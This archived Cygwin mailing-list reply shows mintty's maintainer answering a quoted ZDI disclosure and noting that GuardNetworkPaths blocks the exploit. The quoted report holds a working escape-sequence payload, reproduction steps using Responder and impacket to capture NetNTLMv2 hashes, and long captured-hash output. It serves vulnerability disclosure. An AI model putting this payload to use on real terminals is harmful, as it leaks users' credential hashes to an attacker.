DKIM-Filter: OpenDKIM Filter v2.11.0 delorie.com 47GIvgSu896883 Authentication-Results: delorie.com; dkim=pass (1024-bit key, unprotected) header.d=cygwin.com header.i=@cygwin.com header.a=rsa-sha256 header.s=default header.b=d8UUxsa4 X-Recipient: archive-cygwin@delorie.com DKIM-Filter: OpenDKIM Filter v2.11.0 sourceware.org 4A4FE385F032 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=cygwin.com; s=default; t=1723834660; bh=oCNsDIJQmSrEFOof9byNrT7PhRYyJjzNb8AzaQeGpXI=; h=Date:Subject:To:References:In-Reply-To:List-Id:List-Unsubscribe: List-Archive:List-Post:List-Help:List-Subscribe:From:Reply-To: From; b=d8UUxsa4z3J8t3QdW1NTTo0wAS86YRv7jPtYWWZYnq2FlsVUwJ70Qd/GAKguxzhTy kdGsjSxSxfIk0s9Hvya4X3HPFEDzlb2r3ZtmX1RvR0ev4hczyM3EaGjqvVLvpG3r0W QK82pfsn0Xbopk2mZgrZqpcH/Gwzs6yUgUXDMq7g= X-Original-To: cygwin@cygwin.com Delivered-To: cygwin@cygwin.com DMARC-Filter: OpenDMARC Filter v1.4.2 sourceware.org 804AB3858CDA ARC-Filter: OpenARC Filter v1.0.0 sourceware.org 804AB3858CDA ARC-Seal: i=1; a=rsa-sha256; d=sourceware.org; s=key; t=1723834600; cv=none; b=Tx29JnW5W/sSwYrRkZUU08Qf4XGf/DDEsSdFmy6j0XuH429Mymla1VsMrKvaMVXEl3orDLihDZgsgSnwVCHl1+/ny82LbE4DY/aoUJscT0heUl4hWsYVR3Oth3VojklW/iP9Zg8PA76Xn4C/ocgj7UEbkOOfG0O7xcxvTrhRNjU= ARC-Message-Signature: i=1; a=rsa-sha256; d=sourceware.org; s=key; t=1723834600; c=relaxed/simple; bh=mm5idhPadRBvoL0urx3QfU1Y6kQZ8pyr0KIib/fK5RM=; h=DKIM-Signature:Message-ID:Date:MIME-Version:Subject:To:From; b=JQ3kPJ/PvV8c0DYhzFQXg5LupXhiCpWQzWGvcaEMaalBCNLTa4ay1eMzsKU/L5EHBc8ZC9bjCjL1XKRNLW9gQG+JIVuOC5qCseTIH+SZ8Y1BWOuEP4vbN7ng9/fy4WPO1Par3bCVi9flM23AZGrSTozq5BMW+XXHAjyH49fbtjA= ARC-Authentication-Results: i=1; server2.sourceware.org X-UI-Sender-Class: 55c96926-9e95-11ee-ae09-1f7a4046a0f6 Message-ID: Date: Fri, 16 Aug 2024 20:56:32 +0200 MIME-Version: 1.0 User-Agent: Mozilla Thunderbird Subject: Re: ZDI-CAN-24744: Mintty Path Conversion Improper Input Validation Information Disclosure Vulnerability To: cygwin@cygwin.com References: Autocrypt: addr=towo@towo.net; keydata= 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 kQ== In-Reply-To: X-Provags-ID: V03:K1:s+AXXMS4uvrGfYYVgFIpTFcYXQyfVIqDMDnppkd5C1RM89yZVe7 QYGGnkXM7KmzzoLzmwbTwkXYQVzTkwX9QFmUhfsxWXs22qjKxtC7nqQe1FprwOWSJI6soev WvPc3jpB3ZsYL9AY37HkkkHQ5q9T+NahsOCTgpqBOpq+u49DwGV2COwZY74f98olNz6eUdp mnnur1StUmuldW4qSyq5w== UI-OutboundReport: notjunk:1;M01:P0:w/zZSvuRgiM=;D/uY8LD6Bi3/jAso/v7NmB5by7A qx2UybtSkjsuuAly93Z0lCbm7YYyhWp8fL6dtZs8Xg1cN1DOnGrdJrXuXRQqCu0APbAodcprn 7kJZGC532S06cfvwzTvy/o9qEvSfZZWOEMunce8IZ0bWtPoCSRu+sNQW90EcyD/OcnZQoY3yc cc0w4mjXAiKczN/I0VNaTHzoiGcbQwc/7H0TdwNG8LslBhIDlaH4Q9/YHbLwFHGkt/XSCsi6S rIhuaNE74m4gQQL3b+SguvQgjcLj175UPvRVK/4hM6Rg8TrR9+AK22RBw6kXbvLXv7/dIugOs aADZfAvGtpB8bp90dyeyZloa0UvFyQkYveNpPwC4n5cbGPTvG1sZSh9HE0UQi8vg1JDZzy+rD m44NtoM69O0zrSoT07P1rfXihOYVdmx0eHLkFgcb3nT8975LSZD8gl61MtDVF3UPsODbv8X1i csenddEWG/97o1iT4aVRfpfy8MNlsLVplaDtplB78d5/KFWkF8yzSG5Cs5vw/VSuNf7M4w8SA ZGaWCtyFK2mJQWrfpnKRl7OgGeZfwSBs2bcU0o6v9iCCe/IkEoFgXSS7XzCEU+qpsf66qTkSu oDkJHzhlmk8Ji7Toqj/HNN0WqA6walWz+efTMlWYOnkyG2OI7vIhzyAiBhT2013D0XrwThl6W p+kDzgaBuT7rwug+G5WVk8Nmkml8aHD0RGYtHtD2wd6jhoiejgrR0bgKD0CH79KzebIsi1vCb VeCoELM4kq8LhkqWoDBmc8Df3djVYnfpg== X-Spam-Status: No, score=0.5 required=5.0 tests=BAYES_40, DKIM_SIGNED, DKIM_VALID, DKIM_VALID_AU, DKIM_VALID_EF, KAM_ASCII_DIVIDERS, KAM_LOTSOFHASH, RCVD_IN_DNSWL_NONE, SPF_HELO_NONE, SPF_PASS, TXREP, T_SCC_BODY_TEXT_LINE, WEIRD_PORT autolearn=no autolearn_force=no version=3.4.6 X-Spam-Checker-Version: SpamAssassin 3.4.6 (2021-04-09) on server2.sourceware.org X-BeenThere: cygwin@cygwin.com X-Mailman-Version: 2.1.30 Precedence: list List-Id: General Cygwin discussions and problem reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , From: Thomas Wolff via Cygwin Reply-To: Thomas Wolff Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset="us-ascii"; Format="flowed" Errors-To: cygwin-bounces~archive-cygwin=delorie.com@cygwin.com Sender: "Cygwin" Am 16.08.2024 um 16:25 schrieb zdi-disclosures--- via Cygwin: > The attachment could not be scanned for viruses because it is a password protected file. > ZDI-CAN-24744: Mintty Path Conversion Improper Input Validation Information Disclosure Vulnerability ??? > -- CVSS ----------------------------------------- > > 5.3: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N > > -- ABSTRACT ------------------------------------- > > Trend Micro's Zero Day Initiative has identified a vulnerability affecting the following products: > Mintty - Mintty > > -- VULNERABILITY DETAILS ------------------------ > * Version tested:3.7.1 (Git-2.45.2-64-bit.exe) > * Installer file:Git-2.45.2-64-bit.exe > * Platform tested:win11 23h2 [Version 10.0.22631.3593] > > --- > > ### Analysis > > ``` > Several escape sequences can cause the mintty process to access a file in a specific path, > It is triggered by simply printing them out on bash, eg. \x1b]7773;//0.0.0.0/test\007 > An attacker can specify an arbitrary network path, negotiate an ntlm hash out of the victim's machine to an attacker controlled remote host. > NetNTLMv2 hashes can be used to Pass the Hash, or password cracking using tools like hashcat or johntheripper. > > It's caused by an api provided by msys2. > The api is used to convert between posix and windows paths, but it also checks for symbolic links, which is enough to trigger the vulnerability. > The same code is forked from cygwin, so it could also be theoretically vulnerable, > > In the exploit, It used the escape code for setting the terminal icon OSC 7773, > but it can be done with other escape codes as well. > For example, there's an escape code for indicating the cwd of the shell, > which can lead to mintty `stat`ing the directory, which is sufficient for exploitation. > ``` > > The following cover most of the escape codes that could be exploited: > ``` > - OSC I / OSC 7773 > - OSC 440 > - OSC 11 > - OSC 7 > - OSC 8 > ``` Since mintty 3.7.0, option GuardNetworkPaths and its default setting prevents this exploit. Thomas > The call stack is roughly the following: > ``` > mintty: > src/winmain.c:308 - guardpath > src/charset.c:1104 - path_posix_to_win_w > msys2: > cygwin_create_path (depends on mintty's compilation flags, but it calls cygwin_conv_path regardless) > winsup/cygwin/path.cc:3909 - cygwin_conv_path > winsup/cygwin/path.cc:660 - path_conv::check > ``` > > `path_conv::check` calls several windows apis that cause a connection to a remote path to be initiated. > > > > Here is the reproduce steps. > > Setup an attacker vm (Linux based) and a victim vm (windows). > > Modify the payload for the appropriate ip address (attacker vm's ip): > > ``` > \x1b]7773;//0.0.0.0/test\007 > ``` > > On the Attacker's machine run either [impacket](https://github.com/fortra/impacket)'s smbserver.py or [Responder](https://github.com/lgandx/Responder) with smb server enabled: > > ``` > sudo smbserver.py -ts -smb2support test . > ``` > > ``` > sudo ./Responder.py -I enp1s0 -v > ``` > > Replace `enp1s0` with the proper interface. > > Make sure that other smb services aren't running: > > ``` > systemctl status smbd.service > systemctl status nmbd.service > ``` > > Print the adjusted payload from the beginning in mintty (git-bash.exe). > > The victim's hash should be printed by impacket or Responder. > > > > > Here is the output from responder > ``` > [+] Listening for events... > > [SMB] NTLMv2-SSP Client : 172.16.16.237 > [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi > [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:38cf5ca194861c7c:05F329D7F39AEFE3C744671936ABC00E:010100000000000000D29167A9CCDA0195D8F1578A8B58C30000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 > [SMB] NTLMv2-SSP Client : 172.16.16.237 > [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi > [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:331cb34ad722601a:F71C80EE1309C62CA4FF8E254A7AC1AE:010100000000000000D29167A9CCDA0142C3153183B226600000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 > [SMB] NTLMv2-SSP Client : 172.16.16.237 > [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi > [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:b5bc3a6e83c4d7d7:40218E62EF8DCA0023C166B568781059:010100000000000000D29167A9CCDA01797E79F388A237B30000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 > [SMB] NTLMv2-SSP Client : 172.16.16.237 > [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi > [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:ae5464fd841bcab6:F76567E68408F2B04E41B869711E76F8:010100000000000000D29167A9CCDA01E0A7FFF1FF381FA60000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 > [SMB] NTLMv2-SSP Client : 172.16.16.237 > [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi > [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:3bd0a49004b53416:F21B104294C18C82464FEDDC572E6231:010100000000000000D29167A9CCDA01BAAEF54AF54B72560000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 > [SMB] NTLMv2-SSP Client : 172.16.16.237 > [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi > [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:c089b70c3accfaf7:E6B708A8DA76027A16E76F79F5F24333:010100000000000000D29167A9CCDA01433CAD8EC5BCC31A0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 > [SMB] NTLMv2-SSP Client : 172.16.16.237 > [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi > [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:daa3eae276eaef28:AE4059F544451A21F5779DFB3192D9DA:010100000000000000D29167A9CCDA0110F73C1AE7035F2B0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 > [SMB] NTLMv2-SSP Client : 172.16.16.237 > [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi > [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:56c7b5b6c66d156a:96665824D373D99E5F043EFE7724BCF1:010100000000000000D29167A9CCDA012F33E5442DE0DDD40000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 > [SMB] NTLMv2-SSP Client : 172.16.16.237 > [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi > [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:44db8723d9666e80:2DAC87BC05CCECEB4BC8BFD8A9ED2317:010100000000000000D29167A9CCDA014DFB0815892812720000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 > [SMB] NTLMv2-SSP Client : 172.16.16.237 > [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi > [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:4f6f6e6df73e1d2c:884C66B57E2711811EE502E0796E8138:010100000000000000D29167A9CCDA0148213EEACAF1B7200000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 > [SMB] NTLMv2-SSP Client : 172.16.16.237 > [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi > [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:f1f9c2482522cd95:A0790CFB87DD01F4E10F57F94D487109:010100000000000000D29167A9CCDA01F1D6F8F5882213640000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 > [SMB] NTLMv2-SSP Client : 172.16.16.237 > [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi > [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:0a070bdf7688033f:C4B1F0D2CF4B23B7475AAB780FBCB685:010100000000000000D29167A9CCDA01C53624960CE78E120000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 > [SMB] NTLMv2-SSP Client : 172.16.16.237 > [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi > [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:e8f874be1a16042c:255BDD064E5A8C080FC3E0438A1D3502:010100000000000000D29167A9CCDA01F2A0B31CD1B4EB190000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 > [SMB] NTLMv2-SSP Client : 172.16.16.237 > [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi > [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:b7e3a6f69f1ba3dc:4FBC3B5E8781619637C21E21575EB522:010100000000000000D29167A9CCDA0161610316FA9D3D4E0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 > [SMB] NTLMv2-SSP Client : 172.16.16.237 > [SMB] NTLMv2-SSP Username : DESKTOP-QAVUII5\zdi > [SMB] NTLMv2-SSP Hash : zdi::DESKTOP-QAVUII5:9bceb9d050c9b28f:1618EE69D7DEA633EBD38C27ACC89190:010100000000000000D29167A9CCDA01D3E44752D8FA554B0000000002000800310030003500320001001E00570049004E002D00340038005A005300520036004900570034004300540004003400570049004E002D00340038005A00530052003600490057003400430054002E0031003000350032002E004C004F00430041004C000300140031003000350032002E004C004F00430041004C000500140031003000350032002E004C004F00430041004C000700080000D29167A9CCDA01060004000200000008003000300000000000000001000000002000002E8C50779CF8723DE89AF83DA6BB6949A5588475E1B4A4B6C090C8408C5EE7EF0A001000000000000000000000000000000000000900240063006900660073002F003100370032002E00310036002E00310036002E003200300034000000000000000000 > ``` > > procmon log > ``` > Date: 7/8/2024 2:07:57.3678237 PM > Thread: 4844 > Class: File System > Operation: CreateFile > Result: ACCESS DENIED > Path: \\[attacker IP]\test007\ > Duration: 0.0112557 > Desired Access: Read EA, Read Attributes, Read Control > Disposition: Open > Options: Open Reparse Point > Attributes: n/a > ShareMode: Read, Write, Delete > AllocationSize: n/a > > Description: > Company: > Name: bash.exe > Version: > Path: C:\Program Files\Git\usr\bin\bash.exe > Command Line: "C:\Program Files\Git\usr\bin\bash.exe" --login -i > PID: 6172 > Parent PID: 1844 > Session ID: 1 > User: DESKTOP-QAVUII5\wmliang > Auth ID: 00000000:0015a222 > Architecture: 64-bit > Virtualized: False > Integrity: Medium > Started: 7/8/2024 2:07:57 PM > Ended: 7/8/2024 2:07:57 PM > Modules: > bash.exe 0x100400000 0x245000 C:\Program Files\Git\usr\bin\bash.exe 1/14/2024 5:25:36 AM > msys-2.0.dll 0x210040000 0x1227000 C:\Program Files\Git\usr\bin\msys-2.0.dll Red Hat 3.4.10-87d5722901e1172a57aa4d4e3db84fbafe70d19b 2/14/2024 4:11:38 PM > > 0 FLTMGR.SYS FltGetStreamContext + 0x20cb 0xfffff8045abe961b C:\Windows\System32\drivers\FLTMGR.SYS > 1 FLTMGR.SYS FltGetStreamContext + 0x1b51 0xfffff8045abe90a1 C:\Windows\System32\drivers\FLTMGR.SYS > 2 FLTMGR.SYS FltRequestFileInfoOnCreateCompletion + 0x4ef 0xfffff8045ac21f6f C:\Windows\System32\drivers\FLTMGR.SYS > 3 ntoskrnl.exe IofCallDriver + 0x55 0xfffff80455c29b45 C:\Windows\system32\ntoskrnl.exe > 4 ntoskrnl.exe ProbeForWrite + 0x40fe 0xfffff8045619c8be C:\Windows\system32\ntoskrnl.exe > 5 ntoskrnl.exe ObOpenObjectByNameEx + 0x1844 0xfffff804560cc9e4 C:\Windows\system32\ntoskrnl.exe > 6 ntoskrnl.exe ObOpenObjectByNameEx + 0x1f2 0xfffff804560cb392 C:\Windows\system32\ntoskrnl.exe > 7 ntoskrnl.exe NtCreateFile + 0x4c1 0xfffff80456194311 C:\Windows\system32\ntoskrnl.exe > 8 ntoskrnl.exe NtCreateFile + 0x79 0xfffff80456193ec9 C:\Windows\system32\ntoskrnl.exe > 9 ntoskrnl.exe setjmpex + 0x9045 0xfffff80455e2d505 C:\Windows\system32\ntoskrnl.exe > 10 ntdll.dll NtCreateFile + 0x14 0x7ffb3fdf03f4 C:\Windows\System32\ntdll.dll > 11 msys-2.0.dll setpassent + 0x2ff3 0x2100929c3 C:\Program Files\Git\usr\bin\msys-2.0.dll > 12 msys-2.0.dll cygwin_split_path + 0x2c68 0x210096988 C:\Program Files\Git\usr\bin\msys-2.0.dll > 13 msys-2.0.dll sigfillset + 0x6935 0x2100c40a5 C:\Program Files\Git\usr\bin\msys-2.0.dll > 14 msys-2.0.dll sigfillset + 0x7f98 0x2100c5708 C:\Program Files\Git\usr\bin\msys-2.0.dll > 15 msys-2.0.dll sigfillset + 0x9f81 0x2100c76f1 C:\Program Files\Git\usr\bin\msys-2.0.dll > 16 msys-2.0.dll timegm + 0x4db 0x210193f2b C:\Program Files\Git\usr\bin\msys-2.0.dll > 17 0x110000000 0x110000000 > > ``` > > > -- CREDIT --------------------------------------- > This vulnerability was discovered by: > solid-snail working with Trend Micro Zero Day Initiative > > -- FURTHER DETAILS ------------------------------ > > Supporting files: > > > If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number. > > Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 120 days of the reported date. If you are ready to release a patch at any point leading up to the deadline, please coordinate with us so that we may release our advisory detailing the issue. If the 120-day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations, so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time: > > Zero Day Initiative > zdi-disclosures@trendmicro.com > > The PGP key used for all ZDI vendor communications is available from: > > http://www.zerodayinitiative.com/documents/disclosures-pgp-key.asc > > -- INFORMATION ABOUT THE ZDI -------------------- > Established by TippingPoint and acquired by Trend Micro, the Zero Day Initiative (ZDI) neither re-sells vulnerability details nor exploit code. Instead, upon notifying the affected product vendor, the ZDI provides its Trend Micro TippingPoint customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. > > Please contact us for further details or refer to: > > http://www.zerodayinitiative.com > > -- DISCLOSURE POLICY ---------------------------- > > Our vulnerability disclosure policy is available online at: > > http://www.zerodayinitiative.com/advisories/disclosure_policy/ > > TREND MICRO EMAIL NOTICE > > The information contained in this email and any attachments is confidential and may 